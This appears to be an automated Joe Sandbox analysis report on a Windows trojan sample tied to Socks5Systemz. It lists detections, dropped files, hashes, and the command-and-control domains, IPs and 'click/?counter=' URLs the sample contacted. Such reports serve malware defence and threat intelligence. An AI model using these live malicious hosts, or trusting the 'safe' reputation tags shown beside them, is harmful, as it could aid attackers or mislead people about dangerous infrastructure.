                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1575254 Sample: Mg5bMQ2lWi.exe Startdate: 15/12/2024 Architecture: WINDOWS Score: 100 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 9 other signatures 2->55 8 Mg5bMQ2lWi.exe 2 2->8         started        process3 file4 33 C:\Users\user\AppData\...\Mg5bMQ2lWi.tmp, PE32 8->33 dropped 11 Mg5bMQ2lWi.tmp 17 76 8->11         started        process5 file6 35 C:\Program Files (x86)\CRTGame\crtgame.exe, PE32 11->35 dropped 37 C:\Program Files (x86)\...\is-J3HC1.tmp, PE32 11->37 dropped 39 C:\Program Files (x86)\...\is-001GJ.tmp, PE32 11->39 dropped 41 106 other files (none is malicious) 11->41 dropped 57 Uses schtasks.exe or at.exe to add and modify task schedules 11->57 15 crtgame.exe 1 15 11->15         started        18 net.exe 1 11->18         started        20 crtgame.exe 1 2 11->20         started        23 schtasks.exe 1 11->23         started        signatures7 process8 dnsIp9 43 gdpkvkr.com 185.237.206.129, 49847, 49860, 49866 ITLDC-NLUA Ukraine 15->43 45 bodotpd.com 94.232.249.187, 49736, 49764, 49790 INT-PDN-STE-ASSTEPDNInternalASSY Syrian Arab Republic 15->45 47 89.105.201.183, 2023, 49851, 49865 NOVOSERVE-ASNL Netherlands 15->47 25 conhost.exe 18->25         started        27 net1.exe 1 18->27         started        31 C:\ProgramData\TAudioClass\TAudioClass.exe, PE32 20->31 dropped 29 conhost.exe 23->29         started        file10 process11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Mg5bMQ2lWi.exe55%ReversingLabsWin32.PUA.ICLoader
                  Mg5bMQ2lWi.exe100%AviraHEUR/AGEN.1332570
                  SourceDetectionScannerLabelLink
                  C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-04UN3.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-060C4.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-1CHIA.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-1KFVE.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-3DBAJ.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-44UDD.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-4LN2K.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-63DO2.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-6JHM7.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-83310.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-B8HMN.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-C877S.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-C9QMS.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-CA2OV.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-CKJ1G.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-D14K1.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-DFCBR.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-DMP2Q.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-EI0VO.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-EI90O.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-EQ4MD.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-FBHLC.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-FJDCA.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-GKK7D.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-GRQ3N.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-GSP1P.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-GUEH6.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-HI2BI.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-HVEOK.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-ISCOD.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-ITM21.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmp3%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-JB8NH.tmp0%ReversingLabs
                  C:\Program Files (x86)\CRTGame\bin\x86\is-KR7LG.tmp0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://gdpkvkr.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn/trunk0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svnrepository0%Avira URL Cloudsafe
                  http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde20%Avira URL Cloudsafe
                  http://bodotpd.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn/trunkrepository0%Avira URL Cloudsafe
                  http://185.237.206.129/en-US0%Avira URL Cloudsafe
                  http://www.mp3dev.org/ID3Error0%Avira URL Cloudsafe
                  gdpkvkr.com0%Avira URL Cloudsafe
                  http://www.mpg123.de0%Avira URL Cloudsafe
                  http://mingw-w64.sourceforge.net/X0%Avira URL Cloudsafe
                  http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde0%Avira URL Cloudsafe
                  http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde0%Avira URL Cloudsafe
                  http://lame.sf.net0%Avira URL Cloudsafe
                  http://ocsps.ssl.com0Q0%Avira URL Cloudsafe
                  http://lame.sf.net32bits0%Avira URL Cloudsafe
                  http://LosslessAudio.org/00%Avira URL Cloudsafe
                  http://www.mp3dev.org/0%Avira URL Cloudsafe
                  https://mp4v2.googlecode.com/svn0%Avira URL Cloudsafe
                  http://gdpkvkr.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb230%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bodotpd.com
                  94.232.249.187
                  truetrue
                    unknown
                    gdpkvkr.com
                    185.237.206.129
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://gdpkvkr.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cbtrue
                      • Avira URL Cloud: safe
                      unknown
                      gdpkvkr.comtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://bodotpd.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cbtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://gdpkvkr.com/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23true
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.innosetup.com/Mg5bMQ2lWi.tmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.drfalse
                        high
                        https://gcc.gnu.org/bugs/):is-04UN3.tmp.1.drfalse
                          high
                          http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drfalse
                            high
                            https://mp4v2.googlecode.com/svn/trunkis-OGODD.tmp.1.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://sectigo.com/CPS0is-GSP1P.tmp.1.dr, is-83310.tmp.1.drfalse
                              high
                              http://185.237.206.129/en-UScrtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://ocsp.sectigo.com0is-GSP1P.tmp.1.dr, is-83310.tmp.1.drfalse
                                high
                                http://www.mp3dev.org/ID3Erroris-1CHIA.tmp.1.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://mp4v2.googlecode.com/svnrepositoryis-OGODD.tmp.1.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://ocsps.ssl.com0is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drfalse
                                  high
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sis-GSP1P.tmp.1.dr, is-83310.tmp.1.drfalse
                                    high
                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#is-GSP1P.tmp.1.dr, is-83310.tmp.1.drfalse
                                      high
                                      http://www.mpg123.deis-DFCBR.tmp.1.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://mp4v2.googlecode.com/svn/trunkrepositoryis-OGODD.tmp.1.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://crls.ssl.com/ssl.com-rsa-RootCA.crl0is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drfalse
                                        high
                                        http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde2crtgame.exe, 00000006.00000002.2945587982.00000000036F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.remobjects.com/psUMg5bMQ2lWi.exe, 00000000.00000003.1694432779.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.exe, 00000000.00000003.1694597975.0000000002088000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.drfalse
                                          high
                                          http://lame.sf.netis-1CHIA.tmp.1.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://streams.videolan.org/upload/is-EQ4MD.tmp.1.drfalse
                                            high
                                            http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62ddecrtgame.exe, 00000006.00000002.2945587982.00000000036F6000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://mingw-w64.sourceforge.net/Xis-GRQ3N.tmp.1.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cdecrtgame.exe, 00000006.00000002.2944456684.0000000000A77000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.ssl.com/repository0is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drfalse
                                              high
                                              http://LosslessAudio.org/0is-OMKRE.tmp.1.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://lame.sf.net32bitsis-1CHIA.tmp.1.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.mp3dev.org/is-1CHIA.tmp.1.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://code.google.com/p/mp4v2Dis-OGODD.tmp.1.drfalse
                                                high
                                                http://www.remobjects.com/psMg5bMQ2lWi.exe, 00000000.00000003.1694432779.0000000002340000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.exe, 00000000.00000003.1694597975.0000000002088000.00000004.00001000.00020000.00000000.sdmp, Mg5bMQ2lWi.tmp, Mg5bMQ2lWi.tmp, 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Mg5bMQ2lWi.tmp.0.dr, is-TGPT7.tmp.1.drfalse
                                                  high
                                                  https://mp4v2.googlecode.com/svnis-OGODD.tmp.1.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0is-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drfalse
                                                    high
                                                    http://ocsps.ssl.com0Qis-MJ59N.tmp.1.dr, is-LTIA8.tmp.1.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.sqlite.org/copyright.html.is-PBK8V.tmp.1.drfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      89.105.201.183
                                                      unknownNetherlands
                                                      24875NOVOSERVE-ASNLfalse
                                                      94.232.249.187
                                                      bodotpd.comSyrian Arab Republic
                                                      29256INT-PDN-STE-ASSTEPDNInternalASSYtrue
                                                      185.237.206.129
                                                      gdpkvkr.comUkraine
                                                      21100ITLDC-NLUAtrue
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1575254
                                                      Start date and time:2024-12-15 00:51:07 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 26s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:13
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Mg5bMQ2lWi.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:7700eba1ceaa134b1da16d1ede0e7894.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@15/128@7/3
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 95%
                                                      • Number of executed functions: 179
                                                      • Number of non-executed functions: 242
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: Mg5bMQ2lWi.exe
                                                      TimeTypeDescription
                                                      18:52:39API Interceptor434302x Sleep call for process: crtgame.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      89.105.201.183OFjT8HmzFJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 404
                                                      N6jsQ3XNNX.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 200
                                                      cv viewer plugin 8.31.40.exeGet hashmaliciousSocks5SystemzBrowse
                                                      • 200
                                                      94.232.249.187cNF6fXdjPw.dllGet hashmaliciousSocks5SystemzBrowse
                                                        KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                          wG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                            AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                              6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  185.237.206.129Invoice.xlsxGet hashmaliciousFormBookBrowse
                                                                  • 185.237.206.129/jinn.exe
                                                                  No context
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  ITLDC-NLUAcNF6fXdjPw.dllGet hashmaliciousSocks5SystemzBrowse
                                                                  • 185.237.206.129
                                                                  KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  • 185.237.206.129
                                                                  wG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  • 185.237.206.129
                                                                  AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  • 185.237.206.129
                                                                  file.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.174.173.22
                                                                  secure.htmGet hashmaliciousHTMLPhisherBrowse
                                                                  • 217.12.218.219
                                                                  EIqeWlQMGR.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.174.175.187
                                                                  9WqvcxYptm.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.174.173.22
                                                                  sd2.ps1Get hashmaliciousUnknownBrowse
                                                                  • 195.123.217.43
                                                                  Pago_7839389309_8w20w808_723869189.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 185.174.175.187
                                                                  NOVOSERVE-ASNLwG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  • 89.105.201.183
                                                                  getlab.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  • 89.105.201.183
                                                                  file.exeGet hashmaliciousNymaim, Socks5SystemzBrowse
                                                                  • 89.105.201.183
                                                                  i7j22nof2Q.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  • 89.105.201.183
                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                  • 89.105.201.183
                                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  • 89.105.201.183
                                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  • 89.105.201.183
                                                                  file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  • 89.105.201.183
                                                                  gxjIKuKnu7.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  • 89.105.201.183
                                                                  OFjT8HmzFJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  • 89.105.201.183
                                                                  INT-PDN-STE-ASSTEPDNInternalASSYcNF6fXdjPw.dllGet hashmaliciousSocks5SystemzBrowse
                                                                  • 94.232.249.187
                                                                  KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  • 94.232.249.187
                                                                  wG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  • 94.232.249.187
                                                                  AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  • 94.232.249.187
                                                                  6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  • 94.232.249.187
                                                                  j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                  • 94.232.249.187
                                                                  jade.arm.elfGet hashmaliciousMiraiBrowse
                                                                  • 31.9.99.97
                                                                  jade.ppc.elfGet hashmaliciousMiraiBrowse
                                                                  • 95.212.143.36
                                                                  jade.x86.elfGet hashmaliciousMiraiBrowse
                                                                  • 31.14.164.17
                                                                  Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                                  • 95.212.143.56
                                                                  No context
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy)KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                    wG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                      AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                        6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                          j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                            SecuriteInfo.com.Win32.Malware-gen.2354.25353.exeGet hashmaliciousUnknownBrowse
                                                                              SecuriteInfo.com.Win32.Malware-gen.2354.25353.exeGet hashmaliciousUnknownBrowse
                                                                                SecuriteInfo.com.Win32.Malware-gen.27540.30253.exeGet hashmaliciousUnknownBrowse
                                                                                  SecuriteInfo.com.Win32.Malware-gen.27540.30253.exeGet hashmaliciousUnknownBrowse
                                                                                    SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                                                                                      C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                        wG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                          AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                            6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                              j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                SecuriteInfo.com.Trojan.Win32.Agent.2721.19195.exeGet hashmaliciousPetite VirusBrowse
                                                                                                  SecuriteInfo.com.Trojan.Win32.Agent.3214.8517.exeGet hashmaliciousPetite VirusBrowse
                                                                                                    F9DB076BD8F99C606CDAE2D6EB5F4EC112A705CF28513.exeGet hashmaliciousPetite Virus, PureLog Stealer, Raccoon Stealer v2Browse
                                                                                                      ZC8t06QEi5.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                        sOGrMGU09M.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):337408
                                                                                                          Entropy (8bit):6.515131904432587
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                                          MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                                          SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                                          SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                                          SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: KRdh0OaXqH.exe, Detection: malicious, Browse
                                                                                                          • Filename: wG1fFAzGfH.exe, Detection: malicious, Browse
                                                                                                          • Filename: AGcC2uK0El.exe, Detection: malicious, Browse
                                                                                                          • Filename: 6hvZpn91O8.exe, Detection: malicious, Browse
                                                                                                          • Filename: j9htknb7BQ.exe, Detection: malicious, Browse
                                                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse
                                                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.2354.25353.exe, Detection: malicious, Browse
                                                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse
                                                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe, Detection: malicious, Browse
                                                                                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.371.3693.exe, Detection: malicious, Browse
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26526
                                                                                                          Entropy (8bit):4.600837395607617
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                                                          MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                                                          SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                                                          SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                                                          SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                                                          Malicious:false
